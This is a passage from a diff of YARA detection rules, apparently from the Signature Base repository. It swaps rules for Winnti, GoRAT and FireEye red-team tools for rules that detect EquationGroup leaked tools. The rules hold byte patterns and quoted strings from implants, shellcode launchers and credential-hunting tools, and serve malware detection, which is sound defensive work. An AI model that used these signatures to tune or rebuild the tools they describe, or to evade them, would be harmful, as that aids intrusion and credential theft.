-		$0x140001670 = { 40 55 56 57 41 55 41 56 41 57 B8 38 12 00 00 E8 ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 10 12 00 00 48 8B AC 24 90 12 00 00 4C 8B B4 24 A0 12 00 00 45 33 FF 44 39 3D ?? ?? ?? ?? 49 8B F1 41 0F B7 F8 4C 8B EA 44 8B D9 66 44 89 7C 24 40 }
-		$0x1400016c8 = { B8 01 00 E0 0C }
-		$0x1400016d2 = { 48 89 9C 24 30 12 00 00 4D 85 C9 }
-		$0x1400016ec = { 8B 9C 24 98 12 00 00 83 FB 01 }
-		$0x1400016fc = { 48 8D 54 24 40 }
-		$0x140001701 = { 4C 89 A4 24 28 12 00 00 E8 ?? ?? ?? ?? 44 0F B7 64 24 40 66 44 3B E7 }
-		$0x140001727 = { 48 8D 54 24 40 41 8B CB E8 ?? ?? ?? ?? 0F B7 94 24 A8 12 00 00 66 39 54 24 40 }
-		$0x140001750 = { 41 8B CB E8 ?? ?? ?? ?? 8B F8 83 F8 FF }
-		$0x14000175f = { B8 0F 00 E0 0C }
-		$0x140001764 = { 4C 8B A4 24 28 12 00 00 }
-		$0x14000176c = { 48 8B 9C 24 30 12 00 00 }
-		$0x140001774 = { 48 8B 8C 24 10 12 00 00 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 38 12 00 00 41 5F 41 5E 41 5D 5F 5E 5D C3 }
-		$0x140001795 = { 48 8D 4C 24 54 33 D2 41 B8 B4 11 00 00 44 89 7C 24 50 E8 ?? ?? ?? ?? 48 8D 44 24 50 48 89 44 24 30 45 0F B7 CC 4D 8B C5 49 8B D6 8B CF 44 89 7C 24 28 44 89 7C 24 20 E8 ?? ?? ?? ?? 85 C0 }
-		$0x1400017d5 = { 4C 8D 4C 24 50 44 8B C3 48 8B D5 48 8B CE E8 ?? ?? ?? ?? 48 8D 4C 24 50 8B D8 E8 ?? ?? ?? ?? 8B C3 }
-		$0x1400017fb = { B8 04 00 E0 0C }
-		$0x140001805 = { B8 03 00 E0 0C }
-		$0x14000180f = { B8 02 00 E0 0C }
+		$s1 = "Select * from Win32_Process" fullword ascii
+		$s3 = "\\\\%ls\\root\\cimv2" fullword wide
+		$s5 = "%4ls%2ls%2ls%2ls%2ls%2ls.%11l[0-9]%1l[+-]%6s" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_Winnti_Dropper_X86_Libtomcrypt_Fns : TAU CN APT
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_St_Lp : FILE
 {
 	meta:
-		description = "Designed to catch winnti 4.0 loader and hack tool x86"
-		author = "CarbonBlack Threat Research"
-		id = "48e7a3b0-55c7-5db5-855f-1614bd00afb4"
-		date = "2019-08-26"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2d4ee801-c7f4-5476-8368-89aa2863ba96"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L329-L370"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2238-L2254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "84bfe001758677ff3a0d60d98e29c33ad1525a0afb27b73df750b2131e298879"
+		logic_hash = "38a48a931856e0eb8e16b7902f5e494b50f8895d4221b5359fc3339d1b52eb8e"
 		score = 75
 		quality = 85
-		tags = "TAU, CN, APT"
-		rule_version = 1
-		yara_version = "3.8.1"
-		confidence = "Prod"
-		oriority = "High"
-		TLP = "White"
-		exemplar_hashes = "0fdcbd59d6ad41dda9ae8bab8fad9d49b1357282027e333f6894c9a92d0333b3"
-		sample_md5 = "da3b64ec6468a4ec56f977afb89661b1"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3b6f756cca096548dcad2b6c241c1dafd16806c060bec82a530f4d38755286a2"
 
 	strings:
-		$0x401d20 = { 8B 0D ?? ?? ?? ?? 33 C0 85 C9 }
-		$0x401d30 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 83 F8 ?? }
-		$0x401d46 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 10 83 F8 ?? }
-		$0x401d76 = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 1C 83 F8 ?? }
-		$0x401dc4 = { 56 57 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 33 C0 F3 A5 5F C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 5E C3 }
-		$0x401bd0 = { 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 56 57 85 C0 C7 45 FC ?? ?? ?? ?? }
-		$0x401bf4 = { 8B 45 14 85 C0 }
-		$0x401bff = { 8B 45 18 85 C0 }
-		$0x401c14 = { 8B 7D 08 8D 45 FC 50 57 E8 ?? ?? ?? ?? 8B 75 ?? 83 C4 08 66 }
-		$0x401c31 = { 8B 45 0C 85 C0 }
-		$0x401c3c = { 8D 4D FC 51 57 E8 ?? ?? ?? ?? 66 8B 55 FC 83 C4 08 66 3B 55 24 }
-		$0x401c57 = { 8B 5D 20 85 DB }
-		$0x401c62 = { 57 E8 ?? ?? ?? ?? 8B D0 83 C4 04 83 FA ?? }
-		$0x401c72 = { B9 ?? ?? ?? ?? 33 C0 8D BD 48 EE FF FF C7 85 44 EE FF FF ?? ?? ?? ?? F3 AB 8B 4D 0C 8D 85 44 EE FF FF 50 6A ?? 81 E6 FF FF 00 00 6A ?? 56 51 53 52 E8 ?? ?? ?? ?? 83 C4 1C 85 C0 }
-		$0x401caf = { 8B 45 1C 8B 4D 18 8D 95 44 EE FF FF 52 8B 55 14 50 51 52 E8 ?? ?? ?? ?? 8B F0 8D 85 44 EE FF FF 50 E8 ?? ?? ?? ?? 83 C4 14 8B C6 5F 5E 5B 8B E5 5D C3 }
-		$0x401ce1 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
-		$0x401ced = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
-		$0x401cf9 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
-		$0x401d05 = { 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 }
-		$0x401d16 = { 5F 5E 5B 8B E5 5D C3 }
+		$x1 = "Previous command: set injection processes (status=0x%x)" fullword ascii
+		$x2 = "Secondary injection process is <null> [no secondary process will be used]" fullword ascii
+		$x3 = "Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> " fullword ascii
+		$x4 = "E: Execute a Command on the Implant" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_3_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Epwrapper : FILE
 {
 	meta:
-		description = "This rule uses the same logic as FE_APT_Trojan_Win_GORAT_1_FEBeta with the addition of one check, to look for strings that are known to be in the Gorat implant when a certain cleaning script is not run against it."
-		author = "FireEye"
-		id = "94c195b5-b8e8-56a7-bc11-dbbe2f969b06"
-		date = "2025-02-12"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L47-L83"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "81b72f7f-ba5a-5f45-b77c-071cfb4571d3"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2256-L2271"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "995120b35db9d2f36d7d0ae0bfc9c10d"
-		logic_hash = "4fda951281b3d711e50c24f543b528b93295a119af39245b4bece77f641bbf2b"
+		logic_hash = "9a1a54cd3fef3db9a20f3be25336fcbabe0d993403f001a04a02b5dbfd629543"
 		score = 75
-		quality = 38
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a8eed17665ee22198670e22458eb8c9028ff77130788f24f44986cce6cebff8d"
 
 	strings:
-		$dirty1 = "fireeye" ascii nocase wide
-		$dirty2 = "kulinacs" ascii nocase wide
-		$dirty3 = "RedFlare" ascii nocase wide
-		$dirty4 = "gorat" ascii nocase wide
-		$dirty5 = "flare" ascii nocase wide
-		$go1 = "go.buildid" ascii wide
-		$go2 = "Go build" ascii wide
-		$json1 = "json:\"pid\"" ascii wide
-		$json2 = "json:\"key\"" ascii wide
-		$json3 = "json:\"agent_time\"" ascii wide
-		$json4 = "json:\"rid\"" ascii wide
-		$json5 = "json:\"ports\"" ascii wide
-		$json6 = "json:\"agent_platform\"" ascii wide
-		$rat = "rat" ascii wide
-		$str1 = "handleCommand" ascii wide
-		$str2 = "sendBeacon" ascii wide
-		$str3 = "rat.AgentVersion" ascii wide
-		$str4 = "rat.Core" ascii wide
-		$str5 = "rat/log" ascii wide
-		$str6 = "rat/comms" ascii wide
-		$str7 = "rat/modules" ascii wide
-		$str8 = "murica" ascii wide
-		$str9 = "master secret" ascii wide
-		$str10 = "TaskID" ascii wide
-		$str11 = "rat.New" ascii wide
+		$x1 = "* Failed to get remote TCP socket address" fullword wide
+		$x2 = "* Failed to get 'LPStart' export" fullword wide
+		$s5 = "Usage: %ls <logdir> <dll_search_path> <dll_to_load_path> <socket>" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000 and any of ( $dirty* )
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_Credtheft_MSIL_Adpasshunt_2_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_2000 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "FireEye"
-		id = "44ba09c3-ac0a-58e7-b98c-dedcbf208d00"
-		date = "2025-02-12"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L845-L861"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2273-L2290"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
-		logic_hash = "a76faa34a1f9cc891aeaa65525c8698e49d5a141854ca0cffb42f06a251bea43"
-		score = 50
+		logic_hash = "dfcd7d928c921dbe7162712ca74a105a938fd9ac675faaaa228d05139b2077de"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f9ea8ff5985b94f635d03f3aab9ad4fb4e8c2ad931137dba4f8ee8a809421b91"
 
 	strings:
-		$pdb1 = "\\ADPassHunt\\"
-		$pdb2 = "\\ADPassHunt.pdb"
-		$s1 = "Usage: .\\ADPassHunt.exe"
-		$s2 = "[ADA] Searching for accounts with msSFU30Password attribute"
-		$s3 = "[ADA] Searching for accounts with userpassword attribute"
-		$s4 = "[GPP] Searching for passwords now"
+		$s1 = "0M1U1Z1p1" fullword ascii
+		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
+		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
+		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or 2 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them )
 }
-rule SIGNATURE_BASE_APT_Backdoor_Win_Gorat_Memory_1
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dllload_Target : FILE
 {
 	meta:
-		description = "Identifies GoRat malware in memory based on strings."
-		author = "FireEye"
-		id = "4fcdd98f-1873-58e1-a9f5-73ee0aa5a69f"
-		date = "2025-02-12"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1013-L1039"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9def0814-c86a-5fae-abc2-4185596a74aa"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2292-L2309"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3b926b5762e13ceec7ac3a61e85c93bb"
-		logic_hash = "bf8d80b7a7d35c1bcb353ff66d10bc95c2e6502043acc6554887465a467cdcf7"
+		logic_hash = "ab50ad9e01c55b3f40e98e6e2cf77c1ad7d6d6ec81a56bbb2263a6e05912e272"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a42d5201af655e43cefef30d7511697e6faa2469dc4a74bc10aa060b522a1cf5"
 
 	strings:
-		$rat1 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
-		$rat2 = "rat.(*Core).generateBeacon" fullword
-		$rat3 = "rat.gJitter" fullword
-		$rat4 = "rat/comms.(*protectedChannel).SendCmdResponse" fullword
-		$rat5 = "rat/modules/filemgmt.(*acquire).NewCommandExecution" fullword
-		$rat6 = "rat/modules/latlisten.(*latlistensrv).handleCmd" fullword
-		$rat7 = "rat/modules/netsweeper.(*netsweeperRunner).runSweep" fullword
-		$rat8 = "rat/modules/netsweeper.(*Pinger).listen" fullword
-		$rat9 = "rat/modules/socks.(*HTTPProxyClient).beacon" fullword
-		$rat10 = "rat/platforms/win/dyloader.(*memoryLoader).ExecutePluginFunction" fullword
-		$rat11 = "rat/platforms/win/modules/namedpipe.(*dummy).Open" fullword
-		$winblows = "rat/platforms/win.(*winblows).GetStage" fullword
+		$s1 = "BzWKJD+" fullword ascii
+		$op1 = { 44 24 6c 6c 88 5c 24 6d }
+		$op2 = { 44 24 54 63 c6 44 24 55 74 c6 44 24 56 69 }
+		$op3 = { 44 24 5c 6c c6 44 24 5d 65 c6 44 24 5e }
 
 	condition:
-		$winblows or 3 of ( $rat* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Hacktool_MSIL_Sharpivot_3_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_EXPA : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have the strings of various method names in the SharPivot code."
-		author = "FireEye"
-		id = "956ba026-c2fa-55fd-be53-0cfaa345f27a"
-		date = "2025-02-12"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1145-L1174"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "106efe9b-f70f-51cf-bbb2-b9bf61df1dd1"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2311-L2327"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e4efa759d425e2f26fbc29943a30f5bd"
-		logic_hash = "f51ac9637f47a98beee1b3c37b594e292aab0e1d3f9e49c41b1f3c3ce02e17de"
+		logic_hash = "2aa4ee5b128714cfa7f5d29f7ef110e1b18fb7bc21351444b2472ff74c4139d3"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8"
 
 	strings:
-		$msil = "_CorExeMain" ascii wide
-		$str1 = "SharPivot" ascii wide
-		$str2 = "ParseArgs" ascii wide
-		$str3 = "GenRandomString" ascii wide
-		$str4 = "ScheduledTaskExists" ascii wide
-		$str5 = "ServiceExists" ascii wide
-		$str6 = "lpPassword" ascii wide
-		$str7 = "execute" ascii wide
-		$str8 = "WinRM" ascii wide
-		$str9 = "SchtaskMod" ascii wide
-		$str10 = "PoisonHandler" ascii wide
-		$str11 = "SCShell" ascii wide
-		$str12 = "SchtaskMod" ascii wide
-		$str13 = "ServiceHijack" ascii wide
-		$str14 = "ServiceHijack" ascii wide
-		$str15 = "commandArg" ascii wide
-		$str16 = "payloadPath" ascii wide
-		$str17 = "Schtask" ascii wide
+		$x1 = "* The target is IIS 6.0 but is not running content indexing servicess," fullword ascii
+		$x2 = "--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]sL" fullword ascii
+		$x3 = "By default, the shellcode will attempt to immediately connect s$" fullword ascii
+		$x4 = "UNEXPECTED SHELLCODE CONFIGURATION ERRORs" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+		( uint16( 0 ) == 0x5a4d and filesize < 12000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Hacktool_MSIL_SEATBELT_1_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remoteexecute_Target : FILE
 {
-	meta:
-		description = "This rule looks for .NET PE files that have regex and format strings found in the public tool SeatBelt. Due to the nature of the regex and format strings used for detection, this rule should detect custom variants of the SeatBelt project."
-		author = "FireEye"
-		id = "cfd730ac-1eec-5e04-b871-c14912bc0425"
-		date = "2020-12-08"
-		modified = "2023-01-27"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1210-L1233"
+	meta:
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "608e5244-2d3f-573c-a0de-44637051f4ba"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2329-L2345"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "848837b83865f3854801be1f25cb9f4d"
-		logic_hash = "89275ec08b75cef371b70fb749cbcada3f30309869094ab7940811fe40f8a008"
+		logic_hash = "3eedb6abb09989784a7dc5e721f9901e936f2c0241967b48858e5e5897b9f24a"
 		score = 75
-		quality = 67
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4a649ca8da7b5499821a768c650a397216cdc95d826862bf30fcc4725ce8587f"
 
 	strings:
-		$msil = "_CorExeMain" ascii wide
-		$str1 = "{ Process = {0}, Path = {1}, CommandLine = {2} }" ascii nocase wide
-		$str2 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii nocase wide
-		$str3 = "LogonId=\"(\\d+)\"" ascii nocase wide
-		$str4 = "{0}.{1}.{2}.{3}" ascii nocase wide
-		$str5 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii nocase wide
-		$str6 = "*[System/EventID={0}]" ascii nocase wide
-		$str7 = "*[System[TimeCreated[@SystemTime >= '{" ascii nocase wide
-		$str8 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii nocase wide
-		$str10 = "{0,-23}" ascii nocase wide
+		$s1 = "Win32_Process" fullword ascii
+		$s2 = "\\\\%ls\\root\\cimv2" fullword wide
+		$op1 = { 83 7b 18 01 75 12 83 63 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Builder_PY_REDFLARE_2_1
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_DS_Parselogs : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "FireEye"
-		id = "74c56ee1-734e-5fdb-beee-6345a5993f68"
-		date = "2020-12-01"
-		modified = "2020-12-01"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1376-L1391"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1906c0fc-3fbc-5995-8789-f1c02e574672"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2347-L2362"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4410e95de247d7f1ab649aa640ee86fb"
-		logic_hash = "0f28fb23c0c1d589466c7c541c8dc588b038d02dded0c66c4a448d1f768c95c5"
+		logic_hash = "e4c35476b512378d1e3c7e7e3e9dae16adb0d4de4ecab143d034110836c11d0d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0228691d63038b072cdbf50782990d505507757efbfa87655bb2182cf6375956"
 
 	strings:
-		$s1 = "<510sxxII"
-		$s2 = "0x43,0x00,0x3a,0x00,0x5c,0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00,"
-		$s3 = "parsePluginOutput"
+		$x1 = "* Size (%d) of remaining capture file is too small to contain a valid header" fullword wide
+		$x2 = "* Capture header not found at start of buffer" fullword wide
+		$x3 = "Usage: %ws <capture_file> <results_prefix>" fullword wide
 
 	condition:
-		all of them and #s2 == 2
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_2_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Oracle_Implant : FILE
 {
 	meta:
-		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and has the Go build ID strings. Then checks for various strings known to be in the Gorat implant including strings used in C2 json, names of methods, and the unique string 'murica' used in C2 comms. A check is done to ensure the string 'rat' appears in the binary over 1000 times as it is the name of the project used by the implant and is present well over 2000 times."
-		author = "FireEye"
-		id = "e2c47711-d088-5cb4-8d21-f8199a865a28"
-		date = "2025-02-12"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1453-L1484"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6ff4cd21-1060-5901-842e-c04bde4f16ec"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2364-L2379"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
-		logic_hash = "45c83e0d39184abcbc0ccc5804ab745b4feec1fad424a543a05754e5b4cca311"
+		logic_hash = "568a5d103527e6fd99bbac8d49a2d667f464fd16d5bf276f98c88c39e129b58b"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8e9be4960c62ed7f210ce08f291e410ce0929cd3a86fe70315d7222e3df4587e"
 
 	strings:
-		$go1 = "go.buildid" ascii wide
-		$go2 = "Go build" ascii wide
-		$json1 = "json:\"pid\"" ascii wide
-		$json2 = "json:\"key\"" ascii wide
-		$json3 = "json:\"agent_time\"" ascii wide
-		$json4 = "json:\"rid\"" ascii wide
-		$json5 = "json:\"ports\"" ascii wide
-		$json6 = "json:\"agent_platform\"" ascii wide
-		$rat = "rat" ascii wide
-		$str1 = "handleCommand" ascii wide
-		$str2 = "sendBeacon" ascii wide
-		$str3 = "rat.AgentVersion" ascii wide
-		$str4 = "rat.Core" ascii wide
-		$str5 = "rat/log" ascii wide
-		$str6 = "rat/comms" ascii wide
-		$str7 = "rat/modules" ascii wide
-		$str8 = "murica" ascii wide
-		$str9 = "master secret" ascii wide
-		$str10 = "TaskID" ascii wide
-		$str11 = "rat.New" ascii wide
+		$op0 = { fe ff ff ff 48 89 9c 24 80 21 00 00 48 89 ac 24 }
+		$op1 = { e9 34 11 00 00 b8 3e 01 00 00 e9 2a 11 00 00 b8 }
+		$op2 = { 48 8b ca e8 bf 84 00 00 4c 8b e0 8d 34 00 44 8d }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and all of ( $go* ) and all of ( $json* ) and all of ( $str* ) and #rat > 1000
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
 }
-
-rule SIGNATURE_BASE_APT_Backdoor_Win_GORAT_4_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dmgz_Target : FILE
 {
 	meta:
-		description = "Verifies that the sample is a Windows PE that is less than 10MB in size and exports numerous functions that are known to be exported by the Gorat implant. This is done in an effort to provide detection for packed samples that may not have other strings but will need to replicate exports to maintain functionality."
-		author = "FireEye"
-		id = "ae67445c-e7fd-5858-be8b-7ee84a16a031"
-		date = "2025-02-12"
-		modified = "2025-02-12"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
